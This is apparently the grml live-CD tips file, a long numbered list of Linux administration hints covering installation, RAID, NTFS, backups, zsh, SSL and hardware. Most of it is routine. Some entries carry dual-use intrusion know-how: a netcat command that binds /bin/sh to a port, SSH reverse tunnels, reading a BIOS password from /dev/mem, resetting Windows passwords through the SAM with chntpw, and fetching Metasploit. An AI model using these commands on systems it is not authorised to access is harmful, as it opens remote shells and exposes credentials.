1 Install grml to harddisk:
5 Notice: You can pre-select the partition for the partition selector
6 and mbr dialogs inside grml2hd using:
7 # grml2hd /dev/hda1 -mbr /dev/hda
9 See: man grml2hd + http://grml.org/grml2hd/
11 Install grml on software RAID level 1:
13 Create /dev/md0 (and some more /dev/md* devices) first of all:
14 # cd /dev && MAKEDEV dev
17 # mdadm --create --verbose /dev/md0 --level=raid1 \
18 --raid-devices=2 /dev/hda1 /dev/hdc1
20 Finally install grml on it:
21 # SWRAID='mbr-only' grml2hd /dev/md0 -mbr /dev/md0
23 See: man grml2hd + http://grml.org/grml2hd/
25 Install grml in non interactive mode with grml2hd:
27 Adjust configuration as needed:
28 # vim /etc/grml2hd/config
32 # GRML2HD_NONINTERACTIVE=yes grml2hd
38 Use with care and only if you really know what you are doing!
40 See: man grml2hd + http://grml.org/grml2hd/
46 Boot grml via network:
50 See: man grml-terminalserver + http://grml.org/terminalserver/
52 Deactivate error correction of zsh:
56 Run zsh-help for more information regarding zsh.
58 Disable automatic setting of title in GNU screen:
62 Set it manually e.g. via:
64 % screen -X title foobar
66 Run zsh-help for more information regarding zsh.
68 Do not use menu completion in zsh:
72 Run zsh-help for more information regarding zsh.
74 Run GNU screen with grml-configuration:
80 % screen -c /etc/grml/screenrc
82 Print out grml-version:
90 Configure mutt-ng / muttng:
94 Set up Inode-PPTP connection:
98 # grml-pptp-xdsl-students
100 Set up VPN / WLAN connection at TUG (TU Graz):
102 Set ESSID and request for ip-address via DHCP:
103 # iwconfig $DEVICE essid tug
106 Now run the main script:
109 After running the script an init script is available:
111 # /etc/init.d/vpnctug [start|stop]
113 Set up PPTP connection at VCG (Virtual Campus Graz):
123 # grml-vpn -k 2005 add 1000 192.168.20.1 192.168.20.2
127 Use encrypted files / partitions:
129 # grml-crypt <options>
135 # grml-crypt format /mnt/external1/encrypted_file /mnt/test
136 # cp big_file /mnt/test
137 # grml-crypt stop /mnt/test
141 # grml-crypt start /mnt/external1/encrypted_file /mnt/test
142 # grml-crypt stop /mnt/test
146 Change resolution of X:
148 % xrandr -s '1024x768'
150 Change resolution of framebuffer:
154 Configure newsreader slrn:
158 Configure grml system:
162 Or directly run scripts:
167 Lock screen (X / console):
171 Press ctrl-alt-x to lock a GNU screen session.
173 Change wallpaper in X:
175 % grml-wallpaper <press-tab>
177 Start X window system (XFree86 / Xorg / X.org):
179 % grml-x $WINDOWMANAGER
184 % grml-x -mode '1024x768' wmii
185 % grml-x -nosync wm-ng
187 Collect hardware information:
191 or run as root to collect some more information:
195 will generate a file named info.tar.bz2.
197 Configure hardware detection features of harddisk installation:
201 or manually edit /etc/grml/autoconfig[.small]
203 See: man grml-autoconfig
205 Bootoptions / cheatcodes / bootparams for booting grml:
207 On the grml-ISO if not running grml:
208 % less /cdrom/GRML/grml-cheatcodes.txt
211 % most /usr/share/doc/grml-docs/grml-cheatcodes.txt.gz
213 Report bugs to Debian's Bug Tracking System (BTS):
215 % reportbug --bts debian
217 or adjust /etc/reportbug.conf to your needs.
221 http://grml.org/bugs/
222 http://www.debian.org/Bugs/
224 Offline documentation:
228 Online documentation:
231 http://grml.org/docs/
232 http://wiki.grml.org/doku.php
234 Mount ntfs partition (read-write):
237 # ntfsmount /dev/hda1 /mnt/hda1
239 Overwrite specific file on an NTFS partition:
241 ntfscp /dev/hda1 /tmp/file_source path/to/file_target
243 Resize an NTFS partition:
249 ntfsresize -n -s 10G /dev/hda1 # testcase
250 ntfsresize -s 10G /dev/hda1 # testing was successfull, now really resize partition
251 cfdisk /dev/hda # delete partition hda1, create new one with 10000MB and fs-type 07 (NTFS)
253 Modify resolution for intel graphic chipsets:
259 # 915resolution 4d 1400 1050
261 Connect bluetooth mouse:
265 ... and press 'connect' button on your bluetooth device.
267 Connect bluetooth headset:
271 ... and press 'connect' button on your bluetooth device.
273 Secure delete file / directory / partition:
279 Also take a look at shred(1), sfill(1) and http://dban.sourceforge.net/
281 Use grml on Samsung X20 laptop:
283 # apt-get install grml-samsung-x20
285 See: http://www.michael-prokop.at/computer/samsung_x20.html
287 Development information regarding grml:
289 http://grml.supersized.org/
293 #grml on irc.freenode.org - http://grml.org/irc/
294 http://grml.org/contact/
296 Join the grml mailinglist:
298 http://grml.org/mailinglist/
302 http://grml.org/donations/
304 Commercial support / system administration / adjusted live-cds:
306 grml-solutions: http://grml.org/solutions/
308 Information regarding the kernel provided by grml:
310 http://grml.org/kernel/
312 SMTP command-line test tool:
318 % swaks -s $MAILSERVER -tlsc -a -au $ACCOUNT -ap $PASSWORD -f $MAILADRESSE -t $MAILADRESSE
322 NTFS related packages:
328 Modify service through init script:
335 # /etc/init.d/lvm start
339 # jstest /dev/input/js0
343 % mplayer /path/to/movie
345 Use webcam with mplayer:
347 % mplayer tv:// -tv driver=v4l:width=352:height=288:outfmt=yv12:device=/dev/video0
349 Powerful network discovery tool:
353 Grab an entire CD and compress it to Ogg/Vorbis,
354 MP3, FLAC, Ogg/Speex and/or MPP/MP+(Musepack) format:
358 Show a console session in several terminals:
362 Switch behaviour of caps lock key:
366 grep with Perl-compatible regular expressions:
370 ncp: a fast file copy tool for LANs
375 Remote (receive file):
378 utility for sorting records in complex ways:
382 a smaller, cheaper, faster SED implementation:
390 See: http://grml.org/zsh/
392 zsh reference card for grml system:
395 /usr/share/doc/grml-docs/zsh/grml-zsh-refcard.pdf.gz
399 % for i in foo* ; do mv "$i" "bar${i/foo}" ; done
401 % prename 's/foo/bar/' foo*
403 % zmv 'foo(*)' 'bar$1'
405 Test TFT / LCD display:
413 Improved grep version:
417 Grep with highlighting:
419 % grep --color=auto ...
422 Extract matches when grepping:
425 % ifconfig | grepc 'inet addr:(.*?)\s'
426 % ifconfig | glark --extract-matches 'inet addr:(.*?)\s'
428 Output text as sound:
431 % xsay # when running X and text selected via mouse
433 Adjust a grml harddisk (grml2hd) installation:
437 Get information on movie files:
439 % tcprobe -i file.avi
441 Get an overview of your image files:
443 % convert 'vid:*.jpg' thumbnails.jpg
445 List all standard defines:
447 % gcc -dM -E - < /dev/null
449 Send a mail as reminder:
451 echo "mail -s 'check TODO-list' $MAILADDRESS < /dev/null" | at 23:42
453 ncurses-based presentation tool:
457 See: man tpp and /usr/share/doc/tpp/examples/
459 Use ICQ / Jabber / Yahoo! / AIM / MSN /... on command line:
463 Use IRC on command line:
469 % vimdiff file1 file2
475 Moving between diffs:
485 Hardware monitoring without kernel dependencies:
489 Install grml-iso to usb-stick:
491 % grml2usb grml.iso /mount/point
493 Use mplayer on framebuffer console:
495 % mplayer -vo fbdev ...
497 Use links2 on framebuffer console:
499 % links2 -driver fb ...
501 Switch language / keyboard:
503 * use the bootparam lang to set language environment ($LANG, $LC_ALL, $LANGUAGE)
504 * use the bootparams keyboard / xkeyboard to activate specific keyboard layout
505 Usage example: 'grml lang=us keyboard=de xkeyboard=de'
507 Or run one of the following commands:
511 # loadkeys i386/qwertz/de-latin1-nodeadkeys.kmap.gz # console
514 Switch setting of caps-control key (switch between ctrl + shift) on keyboard:
518 Mount usb device / usb stick:
520 % mount /mnt/external1 # corresponds to /dev/sda1
522 % mount /mnt/external # corresponds to /dev/sda
524 Install Sun Java packages:
526 Download j2re.bin-file from http://java.sun.com/downloads/index.html and run
528 # apt-get install java-package
529 # fakeroot make-jpkg j2re-*.bin
530 # dpkg -i sun-j2re*.deb
531 # update-alternatives --config java
535 ddrescue is an improved version of dd which tries to read and
536 if it fails it will go on with the next sectors, where tools
543 How to make an audio file (e.g. Musepack format) out of a DVD track:
545 % mkfifo /tmp/fifo.wav
546 % mppenc /tmp/fifo.wav track06.mpc &
547 % mplayer -vo null -vc null -ao pcm:fast:file=/tmp/fifo.wav -dvd-device /dev/dvd dvd://1 -chapter 6-6
549 Adjust the mppenc line with the encoder you would like to use,
550 for example 'oggenc -o track06.ogg /tmp/fifo.wav' for ogg files.
554 % mplayer -vo null -dumpaudio -dumpfile track06.raw -aid N -dvd-device /dev/dvd dvd://1 -chapter 6-6
555 to extract audio without processing, where 'N' is the corresponding audio channel (see 'man mplayer')
557 Usage example for getting a PCM/wave file from audio channel 128:
558 % mplayer -vo null -vc null -ao pcm:fast:file=track06.wav -aid 128 -dvd-device /dev/dvd dvd://6
560 Create simple chroot:
562 # make_chroot_jail $USERNAME
564 Convert DOS formated file to unix format:
566 sed 's/.$//' dosfile > unixfile # assumes that all lines end with CR/LF
567 sed 's/^M$//' dosfile > unixfile # in bash/tcsh, press Ctrl-V then Ctrl-M
568 sed 's/\x0D$//' dosfile > unixfile # gsed 3.02.80, but top script is easier
569 awk '{sub(/\r$/,"");print}' # assumes EACH line ends with Ctrl-M
570 gawk -v BINMODE="w" '1' infile >outfile # in DOS environment; cannot be done with
571 # DOS versions of awk, other than gawk
572 tr -d \r < dosfile > unixfile # GNU tr version 1.22 or higher
573 tr -d '\015' < dosfile > unixfile # use octal value for "\r" (see man ascii)
574 tr -d '[\015\032]' < dosfile > unixfile # sometimes ^Z is appended to DOS-files
575 vim -c ":set ff=unix" -c ":wq" file # convert using vim
576 vim -c "se ff=dos|x" file # ... and even shorter ;)
577 recode ibmpc..lat1 file # convert using recode
578 echo -e "s/\r//g" > dos2unix.sed; sed -f dos2unix.sed < dosfile > unixfile
580 Save live audio stream to file:
582 % mplayer -ao pcm:file=$FILE
586 % mencoder mms://file.wmv -o $FILE -ovc copy -oac copy
590 % mimms mms://file.wmv
596 % avimerge -i *.avi -o blub.avi
600 % cat *.mpg > blub.mpg
604 % mencoder file1.wmv -ovc lavc -oac lavc -ofps 25 -srate 48000 -mc 0 -noskip -forceidx -o file1.avi
605 % mencoder file2.wmv -ovc lavc -oac lavc -ofps 25 -srate 48000 -mc 0 -noskip -forceidx -o file2.avi
606 % avimerge -i file1.avi file2.avi -o blub.avi
608 Display MS-Word file:
610 % strings file.doc | fmt | less
616 Convert MS-Word file to postscript:
618 % antiword -p a4 file.doc > file.ps
620 Convert manual to postscript:
622 % zcat /usr/share/man/man1/zsh.1.gz | groff -man > zsh.1.ps
624 % man -t zsh > zsh.ps
628 % dd if=/dev/mem bs=1k skip=768 count=256 2>/dev/null | strings -n 8
630 Read HTTP via netcat:
632 echo "GET / HTTP/1.0\r\n\r\n" | netcat $DOMAIN 80
634 Get X ressources for specific program:
636 % xrdb -q |grep -i xterm
638 Get windowid of specific X-window:
640 % xwininfo -int | grep "Window id:" | cut -d ' ' -f 4
642 Get titel of specific X-window:
646 check locale - LC_MESSAGES:
648 % locale -ck LC_MESSAGES
650 Create random password:
654 % dd if=/dev/urandom bs=14 count=1 | hexdump | cut -c 9-
656 Get tarballs of various Linux Kernel trees:
659 to get the current stable 2.6 release
662 to get a list of all supported trees
664 Transfer your SSH public key to another host:
666 % ssh-keygen # if you don't have a key yet
668 % ssh-copy-id -i ~/.ssh/id_rsa.pub user@remote-system
670 % cat $HOME/.ssh/id_rsa.pub | ssh user@remote-system 'cat >> .ssh/authorized_keys'
672 Update /etc/fstab entries:
676 See "man grml-rebuildfstab" for more details about
677 generation of /etc/fstab (including stuff like
678 fs LABELs / UUIDs,...).
680 Fetch and potentially change SCSI device parameters:
686 reclaim disk space by linking identical files together:
690 Find and remove duplicate files:
694 Perform layer 2 attacks:
700 Guess PC-type hard disk partitions / partition table:
704 Perform a standard scan:
707 Write back the guessed table:
708 # gpart -W /dev/ice /dev/ice
710 Develop, test and use exploit code with the Metasploit Framework:
713 wget http://framework-mirrors.metasploit.com/msf/downloader/framework-3.0.tar.gz
714 unp framework-3.0.tar.gz
718 Useful documentation:
720 % w3m /usr/share/doc/Debian/reference/reference.en.html
722 % xpdf =(zcat /usr/share/doc/Debian/reference/reference.en.pdf.gz)
724 http://grml.org/docs/ grml Documentation
725 http://wiki.grml.org/ grml Wiki
726 http://www.debian.org/doc/ Debian Documentation
727 http://wiki.debian.org/ Debian Wiki
728 http://www.gentoo.org/doc/en/ Gentoo Documentation
729 http://gentoo-wiki.com/ Gentoo Wiki
730 http://www.tldp.org/ The Linux Documentation Project
734 % fortune debian-hints
738 % fortune debian-hints
739 % dpkg -L funny-manpages
741 Backup master boot record (MBR):
743 # dd if=/dev/ice of=/tmp/backup_of_mbr bs=512 count=1
745 Backup partition table:
747 # sfdisk -d /dev/hda > hda.out
749 Restore partition table:
751 # sfdisk /dev/hda < hda.out
753 Clone disk via network using netcat:
756 # nc -vlp 30000 > hda1.img
758 # dd if=/dev/hda1 | nc -vq 0 192.168.1.2 30000
760 Adjust blocksize (dd's option bs=...) and include 'gzip -c'
763 # dd if=/dev/hda1 bs=32M | gzip -c | nc -vq 0 192.168.1.2 30000
765 Backup specific directories via cpio and ssh:
767 # for f in directory_list; do find $f >> backup.list done
768 # cpio -v -o --format=newc < backup.list | ssh user@host "cat > backup_device"
772 This one uses CPU cycles on the remote server to compare the files:
773 # ssh target_address cat remotefile | diff - localfile
774 # cat localfile | ssh target_address diff - remotefile
776 This one uses CPU cycles on the local server to compare the files:
777 # ssh target_address cat <localfile "|" diff - remotefile
779 Useful tools for cloning / backups:
781 * dd: convert and copy a file
782 * dd_rescue: copies data from one file (or block device) to another
783 * pcopy: a replacement for dd
784 * partimage: back up and restore disk partitions
785 * dirvish: Disk based virtual image network backup system
786 * devclone: in-place filesystem conversion -- device cloning
787 * ntfsclone: efficiently clone, image, restore or rescue an NTFS
788 * dump: ext2/3 filesystem backup
789 * udpcast: multicast file transfer tool
790 * cpio: copy files to and from archives
791 * pax: read and write file archives and copy directory hierarchies
792 * netcat / ssh / tar / gzip / bzip2: additional helper tools
794 Use grml as a rescue system:
798 * dd: convert and copy a file
799 * ddrescue: copies data from one file or block device to another
800 * partimage: Linux/UNIX utility to save partitions in a compressed image file
801 * cfdisk: Partition a hard drive
802 * nparted: Newt and GNU Parted based disk partition table manipulator
803 * parted-bf: The GNU Parted disk partition resizing program, small version
804 * testdisk: Partition scanner and disk recovery tool
805 * gpart: Guess PC disk partition table, find lost partitions
809 * e2fsprogs: ext2 file system utilities and libraries
810 * e2tools: utilities for manipulating files in an ext2/ext3 filesystem
811 * e2undel: Undelete utility for the ext2 file system
812 * ext2resize: an ext2 filesystem resizer
813 * recover: Undelete files on ext2 partitions
817 * reiser4progs: administration utilities for the Reiser4 filesystem
818 * reiserfsprogs: User-level tools for ReiserFS filesystems
822 * xfsdump: Administrative utilities for the XFS filesystem
823 * xfsprogs: Utilities for managing the XFS filesystem
827 * jfsutils: utilities for managing the JFS filesystem
831 * ntfsprogs: tools for doing neat things in NTFS partitions from Linux
832 * salvage-ntfs: free NTFS data recovery tools
833 * scrounge-ntfs: data recovery program for NTFS file systems
834 * ntfsresize: resize ntfs partitions
836 Get ASCII value of a character with zsh:
838 % char=N ; print $((#char))
840 Convert a collection of mp3 files to wave or cdr using zsh:
842 % for i (./*.mp3){mpg321 --w - $i > ${i:r}.wav}
844 Convert images (foo.gif to foo.png) using zsh:
846 % for i in **/*.gif; convert $i $i:r.png
848 Remove all "non txt" files using zsh:
852 Remote Shell Using SSH:
855 % ssh -NR 3333:localhost:22 user@yourhost
858 % ssh user@localhost -p 3333
860 Reverse Shell with Netcat:
863 % netcat -v -l -p 3333 -e /bin/sh
866 % netcat 192.168.0.1 3333
868 Reverse Shell via SSH:
870 local host (inside the network):
871 % ssh -NR 1234:localhost:22 remote_host
873 remote host (outside the network):
874 % ssh localhost -p 1234
876 Remove empty directories with zsh:
878 % rmdir ./**/*(/od) 2> /dev/null
880 Find all the empty directories in a tree with zsh:
884 Find all files without a valid owner and change ownership with zsh:
886 % chmod user /**/*(D^u:${(j.:u:.)${(f)"$(</etc/passwd)"}%%:*}:)
888 Display the 5-10 last modified files with zsh:
890 % print -rl -- /path/to/dir/**/*(D.om[5,10])
892 Find and list the ten newest files in directories and subdirs (recursive) with zsh:
894 % print -rl -- **/*(Dom[1,10])
896 Find most recent file in a directory with zsh:
898 % setopt dotglob ; print directory/**/*(om[1])
900 Tunnel all traffic through an external server:
902 % ssh -ND 3333 username@external.machine
904 Then set the SOCKS4/5 proxy to localhost:3333.
905 Check whether it's working by surfing e.g. to checkip.dyndns.org
907 Tunnel everything through SSH via tsocks:
909 set up the SSH proxy on the client side:
911 % ssh -ND 3333 user@remote.host.example.com
913 Adjust /etc/tsocks.conf afterwards (delete all other lines):
918 For programs who natively support proxying connections (e.g. Mozilla
919 Firefox) you can now set the proxy address to localhost port 3333.
921 All other programs which's connections you want to tunnel through your
922 external host are prefixed with tsocks, e.g.:
924 % tsocks netcat example.com 80
925 % tsocks irssi -c irc.quakenet.eu.org -p 6667
927 If you call tsocks without parameters it executes a shell witht the
928 LD_PRELOAD environment variable already set and exported.
930 smartctl - control and monitor utility for harddisks using Self-Monitoring,
931 Analysis and Reporting Technology (SMART):
933 # smartctl --all /dev/ice
935 If you want to use smartctl on S-ATA (sata) disks use:
937 # smartctl -d ata --all /dev/sda
940 # smartctl -t offline /dev/ice
943 # smartctl -t short /dev/ice
945 Display results of test:
946 # smartctl -l selftest /dev/ice
948 Query device information:
949 # smartctl -i /dev/ice
951 Mount a BSD / Solaris partition:
953 # mount -t ufs -o ufstype=ufs2 /dev/hda1 /mnt/hda1
955 Use ufstype 44bsd for FreeBSD, NetBSD, OpenBSD (read-write).
956 Use ufstype ufs2 for >= FreeBSD 5.x (read-only).
957 Use ufstype sun for SunOS (Solaris) (read-write).
958 Use ufstype sunx86 for SunOS for Intel (Solarisx86) (read-write).
960 See /usr/share/doc/linux-doc-$(uname -r)/Documentation/filesystems/ufs.txt.gz
963 Read BIOS (and or BIOS) password:
965 # dd if=/dev/mem bs=512 skip=2 count=1 | hexdump -C | head
967 Clone one of the kernel trees via git:
969 git clone rsync://rsync.kernel.org/pub/scm/linux/kernel/git/torvalds/linux-2.6.git
970 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
971 This path defines the tree. See http://kernel.org/git/ for an overview.
973 Mount filesystems over ssh protocol:
975 % sshfs user@host:/remote_dir /mnt/test
979 % fusermount -u /mnt/test
981 (Notice: requires fuse kernel module)
983 Install Gentoo using grml:
985 See http://www.gentoo.org/doc/en/altinstall.xml
987 Install (plain) Debian (sarge release) via grml:
989 Assuming you want to install Debian to sda1:
991 mkfs.ext3 /dev/sda1 # make an ext3 filesystem on /dev/sda1
992 mount -o rw,suid,dev /dev/sda1 /mnt/test # now mount the new partition
993 debootstrap sarge /mnt/test ftp://ftp.tugraz.at/mirror/debian # get main packages from a debian-mirror
994 chroot /mnt/test /bin/bash # let's chroot into the new system
995 mount -t devpts none /dev/pts # ...otherwise running base-config might fail ("Terminated" or "openpty failed")
996 mount -t proc none /proc # make sure we also have a mounted /proc
997 base-config # now configure some main settings
998 vi /etc/mkinitrd/mkinitrd.conf # adjust $ROOT (to /dev/sda1) for your new partition, autodetection will fail in chroot
999 cd /dev ; ./MAKEDEV generic # make sure we have all necessary devices for lilo
1000 apt-get install lilo linux-image-2.6.12-1-386 # install lilo and a kernel which fits your needs
1001 cp /usr/share/doc/lilo/examples/conf.sample /etc/lilo.conf # let's use a template
1002 vi /etc/lilo.conf && lilo # adjust the file for your needs and run lilo afterwards
1003 umount /proc ; umount /dev/pts # we do not need them any more
1004 exit # now leave chroot
1005 cp /etc/hosts /etc/fstab /mnt/test/etc/ # you might want to take the existing files...
1006 cp /etc/network/interfaces /mnt/test/etc/network/ # ...from the running grml system for your new system
1007 umount /mnt/test && reboot # unmount partition and reboot...
1009 See also: http://www.debian.org/releases/stable/i386/apcs04.html.en
1010 Avoid all of the above steps - use grml-debootstrap(8) instead!
1012 Install (plain) Debian (etch release) via grml
1014 Assuming you want to install Debian to sda1:
1016 mkfs.ext3 /dev/sda1 # make an ext3 filesystem on /dev/sda1
1017 mount -o rw,suid,dev /dev/sda1 /mnt/test # now mount the new partition
1018 debootstrap etch /mnt/test ftp://ftp.tugraz.at/mirror/debian # get main packages from a debian-mirror
1019 chroot /mnt/test /bin/bash # let's chroot into the new system
1020 mount -t proc none /proc # make sure we have a mounted /proc
1021 apt-get install locales console-data # install locales
1022 dpkg-reconfigure locales console-data # adjust locales to your needs
1023 apt-get install vim most zsh screen less initrd-tools file grub \
1024 usbutils pciutils bzip2 sysfsutils dhcp3-client resolvconf \
1025 strace lsof w3m # install useful software
1026 apt-get install linux-headers-2.6-686 linux-image-686 # install current kernel
1028 echo "127.0.0.1 localhost" > /etc/hosts # adjust /etc/hosts and network:
1029 cat >> /etc/network/interfaces << EOF
1030 iface lo inet loopback
1031 iface eth0 inet dhcp
1036 ln -sf /usr/share/zoneinfo/Europe/Vienna /etc/localtime # adjust timezone and /etc/fstab:
1037 cat >> /etc/fstab << EOF
1038 sysfs /sys sysfs auto 0 0
1039 proc /proc proc defaults 0 0
1040 /dev/sda1 / ext3 defaults,errors=remount-ro 0 1
1041 /dev/sda2 none swap sw 0 0
1042 /dev/cdrom /mnt/cdrom0 iso9660 ro,user,noauto 0 0
1044 passwd # set password of user root
1046 mkdir /boot/grub # setup grub
1047 cp /usr/share/doc/grub/examples/menu.lst /boot/grub
1048 cat >> /boot/grub/menu.lst << EOF
1049 title Debian Etch, kernel 2.6.18-3-686 (on /dev/sda1)
1051 kernel /boot/vmlinuz-2.6.18-3-686 root=/dev/sda1 ro
1052 initrd /boot/initrd.img-2.6.18-3-686
1054 vim /boot/grub/menu.lst # adjust grub configuration to your needs
1055 cd /dev && MAKEDEV generic # create default devices
1056 cp -i /usr/lib/grub/i386-pc/* /boot/grub/ # copy stage-files to /boot/grub/
1057 grub install # now install grub, run in grub-cmdline following commands:
1061 umount -a # unmount all filesystems in chroot and finally:
1062 exit # exit the chroot and:
1065 If you want to use lilo instead of grub take a look at
1066 /usr/share/doc/lilo/examples/conf.sample or use the following template:
1068 cat > /etc/lilo.conf << EOF
1069 # This allows booting from any partition on disks with more than 1024 cylinders.
1072 # Specifies the boot device
1075 # Specifies the device that should be mounted as root.
1078 # use Debian on software raid:
1079 # raid-extra-boot=mbr-only
1087 image=/boot/vmlinuz-2.6.18-grml
1091 initrd=/boot/initrd.img-2.6.18-grml
1094 See also: http://www.debian.org/releases/stable/i386/apcs04.html.en
1095 Avoid all of the above steps - use grml-debootstrap(8) instead!
1097 Convert files from Unicode / UTF-8 to ISO:
1099 % iconv -c -f utf8 -t iso-8859-15 < utffile > isofile
1103 % iconv -f iso-8859-15 -t utf8 < isofile > utffile
1105 Assign static setup for network cards (eth0 and eth1) via udev:
1107 First method - manual:
1108 ~~~~~~~~~~~~~~~~~~~~~~
1109 Get information for SYSFS address:
1110 # udevinfo -a -p /sys/class/net/eth0/ | grep address
1112 Then create udev rules:
1113 # cat /etc/udev/network.rules
1115 KERNEL=="eth*", SYSFS{address}=="00:00:00:00:00:01", NAME="wlan0"
1116 KERNEL=="eth*", SYSFS{address}=="00:00:00:00:00:02", NAME="lan0"
1117 # do not match eth* drivers but also e.g. firewire stuff:
1118 ACTION=="add", SUBSYSTEM=="net", SYSFS{address}=="00:00:00:00:00:03", NAME="1394"
1120 Now activate the rules:
1121 # cd /etc/udev/rules.d/ && ln -s ../network.rules z35_network.rules
1123 Unload the drivers, restart udev and load the drivers again to activate
1126 Second method - automatic:
1127 ~~~~~~~~~~~~~~~~~~~~~~~~~~
1128 Run /lib/udev/write_net_rules shipped with recent udev versions:
1130 # INTERFACE=wlan1 /lib/udev/write_net_rules 00:00:00:00:00:04
1132 This command will create /etc/udev/rules.d/z25_persistent-net.rules containing:
1134 SUBSYSTEM=="net", DRIVER=="?*", SYSFS{address}=="00:00:00:00:00:04", NAME=wlan1
1136 See /usr/share/doc/udev/writing_udev_rules/index.html for more information.
1138 Change the suffix from *.sh to *.pl using zsh:
1141 % zmv -W '*.sh' '*.pl'
1143 Generate SSL certificate:
1145 Create self signed certificate (adjust /etc/ssl/openssl.cnf if necessary):
1146 # openssl req -x509 -newkey rsa:1024 -keyout keyfile -out certfile -days 9999 -nodes
1149 # openssl x509 -in certfile -text
1151 Verify against CA certificate:
1152 # openssl verify -CAfile cacert.crt -verbose -purpose sslserver
1154 Generate 2048bit RSA-key:
1155 # openssl req -new -x509 -keyout pub-sec-key.pem -out pub-sec-key.pem -days 365 -nodes
1157 As before but add request to existing key pub-sec-key.pem:
1158 # openssl req -new -out request.pem -keyin pub-sec-key.pem
1160 Show request request.pem:
1161 # openssl req -text -noout -in request.pem
1163 Verify signature of request request.pem:
1164 # openssl req -verify -noout -in request.pem
1166 Generate SHA1 fingerprint (modulo key) of request.pem:
1167 # openssl req -noout -modulus -in request.pem | openssl sha1 -c
1169 Generate 2048bit RSA-key and put it to pub-sec-key.pem. Save self signed certificate in self-signed-certificate.pem:
1170 # openssl req -x509 -days 365 -newkey rsa:2048 -out self-signed-certificate.pem -keyout pub-sec-key.pem
1172 As before but create self signed certificate based on existing key pub-sec-key.pem:
1173 # openssl req -x509 -days 365 -new -out self-signed-certificate.pem -key pub-sec-key.pem
1175 Generate new request out of existing self signed certificate:
1176 # openssl x509 -x509toreq -in self-signed-certificate.pem -signkey pub-sec-key.pem -out request.pem
1178 Display certificate self-signed-certificate.pem in plaintext:
1179 # openssl x509 -text -noout -md5 -in self-signed-certificate.pem
1181 Check self signed certificate:
1182 # openssl verify -issuer_checks -CAfile self-signed-certificate.pem self-signed-certificate.pem
1184 Estable OpenSSL-connection using self-signed-certificate.pem and display certificate:
1185 # openssl s_client -showcerts -CAfile self-signed-certificate.pem -connect www.example.com:443
1187 Generate ssl-certificate for use with apache2:
1189 export RANDFILE=/dev/random
1190 mkdir /etc/apache2/ssl/
1191 openssl req $@ -new -x509 -days 365 -nodes -out /etc/apache2/ssl/apache.pem -keyout /etc/apache2/ssl/apache.pem
1192 chmod 600 /etc/apache2/ssl/apache.pem
1194 Also take a look at make-ssl-cert (debconf wrapper for openssl):
1196 # /usr/sbin/make-ssl-cert /usr/share/ssl-cert/ssleay.cnf /etc/apache2/apache.pem
1198 and mod-ssl-makecert (utility to create SSL certificates in /etc/apache/ssl.*/).
1200 Change Windows NT password(s):
1202 # mount -o rw /mnt/hda1
1203 # cd /mnt/hda1/WINDOWS/system32/config/
1204 # chntpw SAM SECURITY system
1206 Notice: if mounting the partition read-write did not work (check syslog!)
1207 try using mount.ntfs-3g instead: mount.ntfs-3g /dev/hda1 /mnt/hda1
1209 (Be careful with deactivating syskey!)
1211 glark - replacement for grep written in Ruby:
1213 A replacement for (or supplement to) the grep family, glark offers:
1214 Perl compatible regular expressions, highlighting of matches,
1215 context around matches, complex expressions and automatic exclusion
1220 % glark -y keyword file # display only the region that matched, not the entire line
1221 % glark -o format print *.h # search for either "printf" or "format"
1223 More information: man glark
1225 Find CD burning device(s):
1227 General information on CD-ROM:
1228 % cat /proc/sys/dev/cdrom/info
1230 Scan using ATA Packet specific SCSI transport:
1231 # cdrecord -dev=ATA -scanbus
1232 # cdrecord-prodvd -s -scanbus dev=ATA
1234 Get specific information for /dev/ice:
1235 # cdrecord dev=/dev/ice -scanbus
1237 Create devices in /dev on udev:
1239 For example create md devices (/dev/md0, /dev/md1,...):
1240 # cd /dev ; WRITE_ON_UDEV=1 ./MAKEDEV md
1242 Identify network device (NIC):
1244 # ethtool -i $DEVICE
1246 Show NIC statistics:
1248 # ethtool -S $DEVICE
1250 If your NIC shows some aging signs, you may want to be sure:
1252 # ethtool -t $DEVICE
1254 Disable TCP/UDP checksums:
1256 # ethtool -K $DEVICE tx off
1258 grml2hd seems to hang? Getting Squashfs errors? Problems while booting?
1260 Switch to tty12 and take a look at the syslog. If you see something like:
1262 SQUASHFS error: zlib_fs returned unexpected result 0x........
1263 SQUASHFS error: Unable to read cache block [.....]
1264 SQUASHFS error: Unable to read inode [.....]
1266 your ISO/CD-ROM very probably is not ok. Verify it via booting with grml testcd.
1267 Check your CD low-level via running:
1269 # readcd -c2scan dev=/dev/cdrom
1271 If the medium really is ok and it still fails try to boot with deactivated DMA
1272 via using grml nodma at the bootprompt.
1274 Write a Microsoft compatible boot record (MBR) using ms-sys
1276 Write a Windows 2000/XP/2003 MBR to device:
1278 # ms-sys -m /dev/ice
1280 Use a Vodafone 3G Datacard (UMTS) with Linux:
1282 Plug in your vodafone card and check in syslog whether the appropriate
1283 (probably /dev/ttyUSB0 or /dev/noz0) has been created. If so run:
1286 # wvdial --config /etc/wvdial.conf.umts $PROFILE
1289 # gcom -d /dev/ttyUSB0
1290 # wvdial --config /etc/wvdial.conf.umts a1usb
1293 # wvdial --config /etc/wvdial.conf.umts tmnozomi
1296 # wvdial --config /etc/wvdial.conf.umts dreiusb
1298 If you receive invalid DNS nameservers when connecting, like:
1301 --> primary DNS address 10.11.12.13
1302 --> secondary DNS address 10.11.12.14
1304 just provide a working nameserver to resolvconf via:
1306 # echo "nameserver 80.120.17.70" | resolvconf -a ppp0
1308 Notice: some vodafone cards require the nozomi driver (run 'modprobe nozomi' on
1309 your grml system), some other ones require the sierra driver (run
1312 If your device isn't supported by usbserial yet, manually provide vendor and
1313 product ID when loading the usbserial module. Usage example:
1317 Bus 004 Device 008: ID 1199:6813 Sierra Wireless, Inc.
1319 # modprobe usbserial vendor=0x1199 product=0x6813
1321 hdparm - get/set hard disk parameters
1323 Display the identification info that was obtained from the drive at boot time,
1325 # hpdarm -i /dev/ice
1327 Request identification info directly from the drive:
1328 # hpdarm -I /dev/ice
1330 Perform timings of device + cache reads for benchmark and comparison purposes:
1331 # hdparm -tT /dev/ice
1333 bonnie++ - program to test hard drive performance.
1335 # mkdir /mnt/benchmark
1336 # mount /dev/ice /mnt/benchmark
1337 # chmod go+w /mnt/benchmark
1338 # bonnie -u grml -d /mnt/benchmark -s 2000M
1340 Use gizmo with a bluetooth headset:
1342 % DEVICE="/dev/dsp$(awk '/- BT Headset/ {print $1}' /proc/asound/cards)"
1343 % gizmo --mic $DEVICE --speaker $DEVICE
